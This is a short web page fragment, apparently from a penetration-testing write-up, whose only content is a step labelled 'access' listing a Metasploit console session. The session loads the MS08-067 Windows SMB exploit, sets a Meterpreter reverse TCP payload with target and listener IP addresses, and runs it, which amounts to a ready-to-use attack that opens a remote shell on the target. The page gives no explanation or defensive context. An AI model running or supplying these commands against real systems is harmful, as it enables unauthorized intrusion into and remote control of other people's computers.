legal contact rss
 

1. access

msfconsole
msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp 
msf exploit(ms08_067_netapi) > set RHOST 10.10.0.21 
msf exploit(ms08_067_netapi) > set LHOST 10.10.2.111 
msf exploit(ms08_067_netapi) > exploit